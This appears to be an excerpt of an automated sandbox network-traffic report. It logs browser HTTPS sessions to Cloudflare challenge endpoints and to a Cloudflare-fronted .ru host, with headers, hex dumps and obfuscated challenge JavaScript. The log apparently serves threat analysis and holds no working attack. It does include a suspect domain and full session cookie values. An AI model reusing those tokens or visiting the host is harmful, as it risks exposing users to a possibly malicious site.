                                                                        Data Ascii: e[hG(1405)](),m=k[hG(926)],l[hG(835)](m)>-1)?eM[hG(1442)](function(hH){hH=hG,eM[hH(1536)]()},1e3):(n={},n[hG(1750)]=e,n[hG(907)]=f,n[hG(722)]=g,n[hG(961)]=h,n[hG(1332)]=i,o=n,eM[hG(1442)](function(hI){hI=hG,hI(1501)!==k[hI(1095)]?f[hI(1483)](g)(h.j):eM[hI
                                                                        2025-01-16 08:20:19 UTC1369INData Raw: 67 4a 28 31 32 39 34 29 5d 3d 67 6d 2c 67 76 5b 67 4a 28 37 37 32 29 5d 3d 66 4c 2c 67 76 5b 67 4a 28 34 38 35 29 5d 3d 67 69 2c 67 76 5b 67 4a 28 35 39 31 29 5d 3d 67 68 2c 67 76 5b 67 4a 28 31 33 33 35 29 5d 3d 66 43 2c 67 76 5b 67 4a 28 35 32 34 29 5d 3d 66 44 2c 67 76 5b 67 4a 28 31 34 36 36 29 5d 3d 66 5a 2c 67 76 5b 67 4a 28 31 31 30 37 29 5d 3d 67 31 2c 67 76 5b 67 4a 28 39 30 36 29 5d 3d 67 30 2c 67 76 5b 67 4a 28 31 35 36 39 29 5d 3d 67 62 2c 67 76 5b 67 4a 28 31 35 30 33 29 5d 3d 67 61 2c 67 76 5b 67 4a 28 31 36 35 34 29 5d 3d 67 39 2c 67 76 5b 67 4a 28 34 34 39 29 5d 3d 67 38 2c 67 76 5b 67 4a 28 31 35 38 39 29 5d 3d 66 54 2c 67 76 5b 67 4a 28 31 35 36 32 29 5d 3d 67 75 2c 67 76 5b 67 4a 28 31 34 33 37 29 5d 3d 66 58 2c 67 76 5b 67 4a 28 31 32
                                                                        Data Ascii: gJ(1294)]=gm,gv[gJ(772)]=fL,gv[gJ(485)]=gi,gv[gJ(591)]=gh,gv[gJ(1335)]=fC,gv[gJ(524)]=fD,gv[gJ(1466)]=fZ,gv[gJ(1107)]=g1,gv[gJ(906)]=g0,gv[gJ(1569)]=gb,gv[gJ(1503)]=ga,gv[gJ(1654)]=g9,gv[gJ(449)]=g8,gv[gJ(1589)]=fT,gv[gJ(1562)]=gu,gv[gJ(1437)]=fX,gv[gJ(12
                                                                        2025-01-16 08:20:19 UTC1369INData Raw: 56 51 6f 70 7a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 21 3d 68 7d 2c 27 52 42 42 62 52 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 4b 6c 70 42 41 27 3a 6a 38 28 31 36 39 37 29 2c 27 4f 76 52 76 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 26 68 7d 2c 27 61 58 57 79 58 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 66 6d 43 54 61 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 56 76 70 51 4d 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 7d 2c 65 3d 53 74 72 69 6e 67 5b 6a 38 28 31 30 30 37 29 5d 2c 66 3d 7b 27 68 27 3a 66 75 6e
                                                                        Data Ascii: VQopz':function(h,i){return i!=h},'RBBbR':function(h,i){return h(i)},'KlpBA':j8(1697),'OvRvh':function(h,i){return i&h},'aXWyX':function(h,i){return h(i)},'fmCTa':function(h,i){return h==i},'VvpQM':function(h,i){return i==h}},e=String[j8(1007)],f={'h':fun
                                                                        2025-01-16 08:20:19 UTC1369INData Raw: 31 32 38 3e 50 3f 65 2b 3d 78 5b 6a 61 28 31 30 30 37 29 5d 28 50 29 3a 28 64 5b 6a 61 28 31 32 38 32 29 5d 28 31 32 37 2c 50 29 26 26 32 30 34 38 3e 50 3f 42 2b 3d 43 5b 6a 61 28 31 30 30 37 29 5d 28 64 5b 6a 61 28 31 35 34 36 29 5d 28 50 3e 3e 36 2e 39 31 2c 31 39 32 29 29 3a 28 44 2b 3d 45 5b 6a 61 28 31 30 30 37 29 5d 28 64 5b 6a 61 28 31 35 34 36 29 5d 28 64 5b 6a 61 28 38 38 33 29 5d 28 50 2c 31 32 29 2c 32 32 34 29 29 2c 46 2b 3d 47 5b 6a 61 28 31 30 30 37 29 5d 28 64 5b 6a 61 28 31 34 38 39 29 5d 28 50 3e 3e 36 2e 38 32 2c 36 33 29 7c 31 32 38 29 29 2c 48 2b 3d 49 5b 6a 61 28 31 30 30 37 29 5d 28 64 5b 6a 61 28 35 30 36 29 5d 28 64 5b 6a 61 28 36 32 36 29 5d 28 50 2c 36 33 29 2c 31 32 38 29 29 29 7d 65 6c 73 65 20 66 6f 72 28 4d 3d 78 5b 43 5d 2c
                                                                        Data Ascii: 128>P?e+=x[ja(1007)](P):(d[ja(1282)](127,P)&&2048>P?B+=C[ja(1007)](d[ja(1546)](P>>6.91,192)):(D+=E[ja(1007)](d[ja(1546)](d[ja(883)](P,12),224)),F+=G[ja(1007)](d[ja(1489)](P>>6.82,63)|128)),H+=I[ja(1007)](d[ja(506)](d[ja(626)](P,63),128)))}else for(M=x[C],


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        10192.168.2.549728104.18.94.414433504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-16 08:20:19 UTC739OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                        Host: challenges.cloudflare.com
                                                                        Connection: keep-alive
                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                        sec-ch-ua-mobile: ?0
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                        sec-ch-ua-platform: "Windows"
                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                        Sec-Fetch-Site: same-origin
                                                                        Sec-Fetch-Mode: no-cors
                                                                        Sec-Fetch-Dest: image
                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/p7h9d/0x4AAAAAAA5D2nHjAPlCZ2mF/auto/fbE/normal/auto/
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        2025-01-16 08:20:19 UTC240INHTTP/1.1 200 OK
                                                                        Date: Thu, 16 Jan 2025 08:20:19 GMT
                                                                        Content-Type: image/png
                                                                        Content-Length: 61
                                                                        Connection: close
                                                                        cache-control: max-age=2629800, public
                                                                        Server: cloudflare
                                                                        CF-RAY: 902caf887d2cf5fa-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        2025-01-16 08:20:19 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                        Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        11192.168.2.549717104.21.96.14433504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-16 08:20:20 UTC1320OUTGET /favicon.ico HTTP/1.1
                                                                        Host: 56.hanagibenewe.ru
                                                                        Connection: keep-alive
                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                        sec-ch-ua-mobile: ?0
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                        sec-ch-ua-platform: "Windows"
                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                        Sec-Fetch-Site: same-origin
                                                                        Sec-Fetch-Mode: no-cors
                                                                        Sec-Fetch-Dest: image
                                                                        Referer: https://56.hanagibenewe.ru/Y7MD/
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Cookie: XSRF-TOKEN=eyJpdiI6InJOTm1BYnFIRjRMOEFWb3VZUklzbHc9PSIsInZhbHVlIjoiemF2elZveUJPbUpLNThJZEVhNkFuWjB2cWJjMm1wNXBvVEJVV21nZlFpVDdmUncrWWJKcHZ1UHlLbnR0SGdvTHpJcFQxcnprb20reTZYZ1E4aThTVXk5VlJaM3VUeVJhMmRGV2ZDc1JrWmE1elp5R2tCQkhnbFhHbUxWUFVJTEMiLCJtYWMiOiJiNDE0MmMyNjNkODQ3NDcyZDdkMjZmMWJkMzE3YTA1NGEwZDJhMzcyYzY2NTkxZmIyM2QyMDkxMWZjMzYyNjdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2WlBCMnRNRkljcXBtR3Z5RnRqZVE9PSIsInZhbHVlIjoiZXZGSnY1a3llVTAvRGM0NjRCUVIxamQ1bUJXc2w0NVhGYmZUVW1DTzdpUkowSW1GUVd6V2VkQm9JMEVCQ25JRlhNSmpVbTRGcU1WbG9CUVVkdjVGY0VWMlVNbllVaE1BZTNUTnVJUEhUQlpWbG56K090ZGVNWkpoUnBKenFqaVMiLCJtYWMiOiJjYmNiOWMxMWE3MjNmNWJmMzRkYjlkMjYyYzZkZDI5MTkxOGQzOGEyYjlmNmU1NjFjZDMwOGRiMmI2NGQ0MmQwIiwidGFnIjoiIn0%3D
                                                                        2025-01-16 08:20:20 UTC1066INHTTP/1.1 404 Not Found
                                                                        Date: Thu, 16 Jan 2025 08:20:20 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Cache-Control: max-age=14400
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GtRgaigRntOdmFOFRSYz%2FKEAFeIqzMNTOUkCjVxFEFJgP5X9FTT7UqH0bLCOY1Zk%2B%2B8%2B%2BOqj7N02ZMr9stlxUDsYEr%2FZHi1ZjfRsLLPnhhlzsN%2FJQgMU1VlfQTd4gA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Vary: Accept-Encoding
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=5048&min_rtt=5005&rtt_var=1487&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2237&delivery_rate=542269&cwnd=228&unsent_bytes=0&cid=d01d45ba3f4da604&ts=154&x=0"
                                                                        CF-Cache-Status: MISS
                                                                        Server: cloudflare
                                                                        CF-RAY: 902caf8afd0ac32e-EWR
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1476&min_rtt=1475&rtt_var=557&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1898&delivery_rate=1959731&cwnd=178&unsent_bytes=0&cid=fade22bf33827ac2&ts=3902&x=0"
                                                                        2025-01-16 08:20:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        12192.168.2.549729104.18.95.414433504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-16 08:20:20 UTC385OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                        Host: challenges.cloudflare.com
                                                                        Connection: keep-alive
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                        Accept: */*
                                                                        Sec-Fetch-Site: none
                                                                        Sec-Fetch-Mode: cors
                                                                        Sec-Fetch-Dest: empty
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        2025-01-16 08:20:20 UTC240INHTTP/1.1 200 OK
                                                                        Date: Thu, 16 Jan 2025 08:20:20 GMT
                                                                        Content-Type: image/png
                                                                        Content-Length: 61
                                                                        Connection: close
                                                                        cache-control: max-age=2629800, public
                                                                        Server: cloudflare
                                                                        CF-RAY: 902caf8c399643d9-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        2025-01-16 08:20:20 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                        Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        13192.168.2.549730104.18.95.414433504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-16 08:20:20 UTC433OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=902caf840eaa7ce8&lang=auto HTTP/1.1
                                                                        Host: challenges.cloudflare.com
                                                                        Connection: keep-alive
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                        Accept: */*
                                                                        Sec-Fetch-Site: none
                                                                        Sec-Fetch-Mode: cors
                                                                        Sec-Fetch-Dest: empty
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        2025-01-16 08:20:20 UTC331INHTTP/1.1 200 OK
                                                                        Date: Thu, 16 Jan 2025 08:20:20 GMT
                                                                        Content-Type: application/javascript; charset=UTF-8
                                                                        Content-Length: 117864
                                                                        Connection: close
                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                        Server: cloudflare
                                                                        CF-RAY: 902caf8dfc9d7cb2-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        2025-01-16 08:20:20 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 55 52 61 4f 61 38 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65
                                                                        Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.URaOa8={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconce
                                                                        2025-01-16 08:20:20 UTC1369INData Raw: 68 61 6e 25 32 30 65 78 70 65 63 74 65 64 2e 25 32 30 43 68 65 63 6b 25 32 30 79 6f 75 72 25 32 30 49 6e 74 65 72 6e 65 74 25 32 30 63 6f 6e 6e 65 63 74 69 6f 6e 25 32 30 61 6e 64 25 32 30 25 33 43 61 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 72 65 66 72 65 73 68 5f 6c 69 6e 6b 25 32 32 25 33 45 72 65 66 72 65 73 68 25 32 30 74 68 65 25 32 30 70 61 67 65 25 33 43 25 32 46 61 25 33 45 25 32 30 69 66 25 32 30 74 68 65 25 32 30 69 73 73 75 65 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 68 75 6d 61 6e 5f 62 75 74 74 6f 6e 5f 74 65 78 74 22 3a 22 56 65 72 69 66 79 25 32 30 79 6f 75 25 32 30 61 72 65 25 32 30 68 75 6d 61 6e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 65 78 70 69 72 65 64 22 3a 22 45 78 70 69 72 65 64 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 69 66 72
                                                                        Data Ascii: han%20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","human_button_text":"Verify%20you%20are%20human","turnstile_expired":"Expired","turnstile_ifr
                                                                        2025-01-16 08:20:20 UTC1369INData Raw: 2c 67 33 2c 67 37 2c 67 38 2c 67 39 2c 67 64 2c 67 65 2c 67 68 2c 67 69 2c 67 66 2c 67 67 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 67 49 28 36 33 34 29 29 2f 31 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 30 32 29 29 2f 32 2b 70 61 72 73 65 49 6e 74 28 67 49 28 38 33 33 29 29 2f 33 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 32 38 29 29 2f 34 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 37 38 33 29 29 2f 35 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 34 39 30 29 29 2f 36 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 38 39 37 29 29 2f 37 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 31
                                                                        Data Ascii: ,g3,g7,g8,g9,gd,ge,gh,gi,gf,gg){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(634))/1+parseInt(gI(1202))/2+parseInt(gI(833))/3+-parseInt(gI(1128))/4*(parseInt(gI(783))/5)+-parseInt(gI(1490))/6*(parseInt(gI(897))/7)+parseInt(gI(11
                                                                        2025-01-16 08:20:20 UTC1369INData Raw: 65 4d 5b 67 4e 28 33 39 31 29 5d 5b 67 4e 28 31 34 33 36 29 5d 2c 27 63 6f 64 65 27 3a 65 5b 67 4e 28 33 32 32 29 5d 2c 27 72 63 56 27 3a 65 4d 5b 67 4e 28 33 39 31 29 5d 5b 67 4e 28 31 35 34 39 29 5d 7d 2c 27 2a 27 29 29 7d 2c 67 29 7d 2c 65 4d 5b 67 4a 28 33 36 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 69 2c 67 4f 2c 6a 2c 6b 2c 6c 2c 48 2c 49 2c 6d 2c 6e 2c 6f 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 29 7b 6b 3d 28 67 4f 3d 67 4a 2c 6a 3d 7b 7d 2c 6a 5b 67 4f 28 31 31 39 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 48 26 47 7d 2c 6a 5b 67 4f 28 38 31 32 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 2c 6a 5b 67 4f 28 36 38 30 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b
                                                                        Data Ascii: eM[gN(391)][gN(1436)],'code':e[gN(322)],'rcV':eM[gN(391)][gN(1549)]},'*'))},g)},eM[gJ(365)]=function(g,h,i,gO,j,k,l,H,I,m,n,o,s,x,B,C,D,E,F){k=(gO=gJ,j={},j[gO(1198)]=function(G,H){return H&G},j[gO(812)]=function(G,H){return G+H},j[gO(680)]=function(G,H){
                                                                        2025-01-16 08:20:20 UTC1369INData Raw: 5b 67 4f 28 31 36 31 38 29 5d 29 2c 73 3d 7b 7d 2c 73 5b 67 4f 28 37 30 36 29 5d 3d 65 4d 5b 67 4f 28 33 39 31 29 5d 5b 67 4f 28 37 30 36 29 5d 2c 73 5b 67 4f 28 36 34 37 29 5d 3d 65 4d 5b 67 4f 28 33 39 31 29 5d 5b 67 4f 28 36 34 37 29 5d 2c 73 5b 67 4f 28 36 33 35 29 5d 3d 65 4d 5b 67 4f 28 33 39 31 29 5d 5b 67 4f 28 36 33 35 29 5d 2c 73 5b 67 4f 28 38 30 38 29 5d 3d 65 4d 5b 67 4f 28 33 39 31 29 5d 5b 67 4f 28 33 35 32 29 5d 2c 78 3d 73 2c 42 3d 6e 65 77 20 65 4d 5b 28 67 4f 28 31 34 35 30 29 29 5d 28 29 2c 21 42 29 72 65 74 75 72 6e 3b 43 3d 67 4f 28 34 30 36 29 2c 42 5b 67 4f 28 33 33 39 29 5d 28 43 2c 6f 2c 21 21 5b 5d 29 2c 42 5b 67 4f 28 31 37 30 36 29 5d 3d 35 65 33 2c 42 5b 67 4f 28 38 38 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 42 5b
                                                                        Data Ascii: [gO(1618)]),s={},s[gO(706)]=eM[gO(391)][gO(706)],s[gO(647)]=eM[gO(391)][gO(647)],s[gO(635)]=eM[gO(391)][gO(635)],s[gO(808)]=eM[gO(391)][gO(352)],x=s,B=new eM[(gO(1450))](),!B)return;C=gO(406),B[gO(339)](C,o,!![]),B[gO(1706)]=5e3,B[gO(888)]=function(){},B[
                                                                        2025-01-16 08:20:20 UTC1369INData Raw: 28 73 2c 76 29 7b 72 65 74 75 72 6e 20 76 21 3d 3d 73 7d 2c 6a 5b 67 52 28 31 35 31 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 76 29 7b 72 65 74 75 72 6e 20 73 3e 76 7d 2c 6a 5b 67 52 28 31 35 32 32 29 5d 3d 67 52 28 31 30 31 37 29 2c 6a 5b 67 52 28 31 36 31 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 76 29 7b 72 65 74 75 72 6e 20 76 3d 3d 3d 73 7d 2c 6a 5b 67 52 28 31 32 39 30 29 5d 3d 67 52 28 31 31 32 33 29 2c 6a 5b 67 52 28 35 36 32 29 5d 3d 67 52 28 37 34 39 29 2c 6b 3d 6a 2c 6c 3d 65 5b 67 52 28 31 33 34 37 29 5d 28 29 2c 6d 3d 67 52 28 31 34 38 31 29 2c 6b 5b 67 52 28 31 35 31 37 29 5d 28 6c 5b 67 52 28 35 37 30 29 5d 28 6d 29 2c 2d 31 29 29 7b 69 66 28 6b 5b 67 52 28 31 35 32 32 29 5d 21 3d 3d 67 52 28 31 35 38 33 29 29 65 4d 5b 67 52 28 31 34
                                                                        Data Ascii: (s,v){return v!==s},j[gR(1517)]=function(s,v){return s>v},j[gR(1522)]=gR(1017),j[gR(1615)]=function(s,v){return v===s},j[gR(1290)]=gR(1123),j[gR(562)]=gR(749),k=j,l=e[gR(1347)](),m=gR(1481),k[gR(1517)](l[gR(570)](m),-1)){if(k[gR(1522)]!==gR(1583))eM[gR(14
                                                                        2025-01-16 08:20:20 UTC1369INData Raw: 5b 68 44 28 35 32 39 29 5d 3d 3d 3d 68 44 28 34 33 37 29 26 26 67 5b 68 44 28 31 36 30 33 29 5d 3d 3d 3d 66 5b 68 44 28 31 33 37 35 29 5d 3f 66 73 3d 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 53 28 29 7d 2c 31 65 33 29 3a 67 26 26 66 5b 68 44 28 35 32 37 29 5d 28 67 5b 68 44 28 35 32 39 29 5d 2c 66 5b 68 44 28 38 33 34 29 5d 29 26 26 66 5b 68 44 28 31 36 36 32 29 5d 28 67 5b 68 44 28 31 36 30 33 29 5d 2c 66 5b 68 44 28 33 37 32 29 5d 29 26 26 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 66 73 29 7d 29 2c 66 75 3d 21 5b 5d 2c 21 65 56 28 67 4a 28 39 33 37 29 29 26 26 28 66 53 28 29 2c 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 69 61 2c 63 2c 64 2c 65 29 7b 69 61 3d 67 4a 2c 63 3d 7b 27 48 77 6b 47 48 27 3a 66
                                                                        Data Ascii: [hD(529)]===hD(437)&&g[hD(1603)]===f[hD(1375)]?fs=setInterval(function(){fS()},1e3):g&&f[hD(527)](g[hD(529)],f[hD(834)])&&f[hD(1662)](g[hD(1603)],f[hD(372)])&&clearInterval(fs)}),fu=![],!eV(gJ(937))&&(fS(),setInterval(function(ia,c,d,e){ia=gJ,c={'HwkGH':f
                                                                        2025-01-16 08:20:20 UTC1369INData Raw: 2c 27 62 50 68 62 72 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2b 69 7d 2c 27 53 7a 49 4f 67 27 3a 69 56 28 39 32 30 29 2c 27 46 63 46 56 79 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 59 56 62 4f 70 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 56 7a 74 4b 54 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 26 68 7d 2c 27 49 64 75 49 76 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 56 42 73 4f 44 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 4b 45 47 68 72 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69
                                                                        Data Ascii: ,'bPhbr':function(h,i){return h+i},'SzIOg':iV(920),'FcFVy':function(h,i){return h(i)},'YVbOp':function(h,i){return h<<i},'VztKT':function(h,i){return i&h},'IduIv':function(h,i){return h(i)},'VBsOD':function(h,i){return h<<i},'KEGhr':function(h,i){return i
                                                                        2025-01-16 08:20:20 UTC1369INData Raw: 2c 4e 2c 4f 2c 50 2c 52 29 7b 69 66 28 69 59 3d 69 56 2c 78 3d 7b 7d 2c 78 5b 69 59 28 36 37 33 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 51 2c 52 29 7b 72 65 74 75 72 6e 20 52 3d 3d 3d 51 7d 2c 78 5b 69 59 28 31 35 38 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 51 2c 52 29 7b 72 65 74 75 72 6e 20 52 5e 51 7d 2c 78 5b 69 59 28 31 35 37 36 29 5d 3d 64 5b 69 59 28 31 33 31 35 29 5d 2c 78 5b 69 59 28 31 30 37 34 29 5d 3d 64 5b 69 59 28 39 34 32 29 5d 2c 78 5b 69 59 28 34 39 37 29 5d 3d 69 59 28 36 36 32 29 2c 42 3d 78 2c 6e 75 6c 6c 3d 3d 6a 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 44 3d 7b 7d 2c 45 3d 7b 7d 2c 46 3d 27 27 2c 47 3d 32 2c 48 3d 33 2c 49 3d 32 2c 4a 3d 5b 5d 2c 4b 3d 30 2c 4c 3d 30 2c 4d 3d 30 3b 64 5b 69 59 28 39 35 36 29 5d 28 4d 2c 6a 5b 69 59 28 35
                                                                        Data Ascii: ,N,O,P,R){if(iY=iV,x={},x[iY(673)]=function(Q,R){return R===Q},x[iY(1587)]=function(Q,R){return R^Q},x[iY(1576)]=d[iY(1315)],x[iY(1074)]=d[iY(942)],x[iY(497)]=iY(662),B=x,null==j)return'';for(D={},E={},F='',G=2,H=3,I=2,J=[],K=0,L=0,M=0;d[iY(956)](M,j[iY(5
